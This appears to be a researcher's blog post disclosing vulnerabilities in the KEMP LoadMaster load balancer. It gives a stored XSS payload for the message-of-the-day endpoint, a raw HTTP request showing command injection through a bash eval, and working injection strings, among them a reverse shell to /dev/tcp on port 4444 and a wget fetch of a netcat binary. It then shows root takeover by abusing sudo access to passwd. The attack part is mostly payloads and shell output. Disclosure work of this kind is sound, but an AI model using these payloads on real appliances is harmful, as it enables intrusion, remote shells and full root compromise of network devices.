So back in October, Roberto SL and myself had a play with KEMP Load Balancer and found a whole load of issues with it :-) On this version I had first-pass at it and found XSS (stored), Command Injection (with a lovely easy privesc up to root...) and that it was vulnerable to shellshock! Happy days...
After this, Roberto really went to town on it and smashed it! His main post is here: http://blog.malerisch.net/2015/04/playing-with-kemp-load-master.html
Stored XSS in the MoTD
POST'ing to /progs/doconfig/setmotd with something like "testing</textarea><script>alert(1)</script>" works well and handily is presented to *every* user as soon as they login.
Command Injection
| POST /progs/doconfig/setmotd HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://x.x.x.x/progs/doconfig/setmotd Cookie: JSESSIONID=XXXX Authorization: Basic XXXX== Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 22 motd='&motdsub=Set+MotD |
The response to this contains the following string;
/usr/wui/progs/util.sh: eval: line 385: unexpected EOF while
looking for matching `''
/usr/wui/progs/util.sh: eval: line 386: syntax error:
unexpected end of file
This refers to the following function of bash script;
read_post()
{
set -f
eval
${1}=\'`post_read "$1" "$post"`\'
set +f
}
Some working examples;
- motd='\`a ls\`'&motdsub=Set+MotD (meh)
- motd='\`a bash --help\`'&motdsub=Set+MotD (okay...)
- motd='\`a ls -la ~/.ssh \`'&motdsub=Set+MotD (heh)
- motd='\`a echo -e \'bash -i > /dev/tcp/x.x.x.x/4444 0<\\x261 2>\\x261\'\`'&motdsub=Set+MotD (w00h00)
- motd='\` cd /tmp; wget http://x.x.x.x/nc-static-exec \`'&motdsub=Set+MotD (seriously... this thing has wget installed...)
Privesc up on the box using poorly configured sudoers;
| bash-3.00$ cat /etc/sudoers # sudoers file. # # User privilege specification Defaults logfile=/dev/null,!syslog root ALL=(ALL) ALL bal ALL = NOPASSWD: /bin/mount, /bin/umount, /sbin/reboot, /sbin/killproc, /bin/date, /bin/cp, /bin/rm, /bin/chmod, /etc/rc.d/config, /etc/rc.d/rsync, /sbin/startproc, /sbin/hwclock, /bin/loadkeys, /sbin/ifconfig, /etc/rc.d/pull_config, /etc/rc.d/sslproxy, /etc/rc.d/iptables, /usr/bin/passwd, /bin/mv, /sbin/ntpdate hsync ALL = NOPASSWD: /etc/rc.d/config,/etc/rc.d/rsync,/sbin/hwclock,/usr/sbin/tsync,/bin/date bash-3.00$ sudo /usr/bin/passwd root New Password:XXXX Reenter New Password: XXXX Changing password for root. bash-3.00$ su root - Password: XXXX pwd / touch testing ls -la testing -rw-r--r-- 1 root root 0 Nov 4 10:50 testing |
For anybody else wanting to check out the latest version of KEMP.... The KEMP vmware image can be freely downloaded from their
website, alter the vmx file to include the line;
bios.bootOrder = "ethernet5,ethernet2,cdrom,hdd,floppy"
..and boot off the kali live cd (64 bit version is more useful as a lot of
the custom binaries on the kemp build are 64 bit), then do the following to get
the image open;
- mount the first sda partition in kali
- gunzip the initrd.gz
- mkdir initrdmount
- mount –o loop initrd initrdmount
- KEMP filesystem now free to explore… :-)
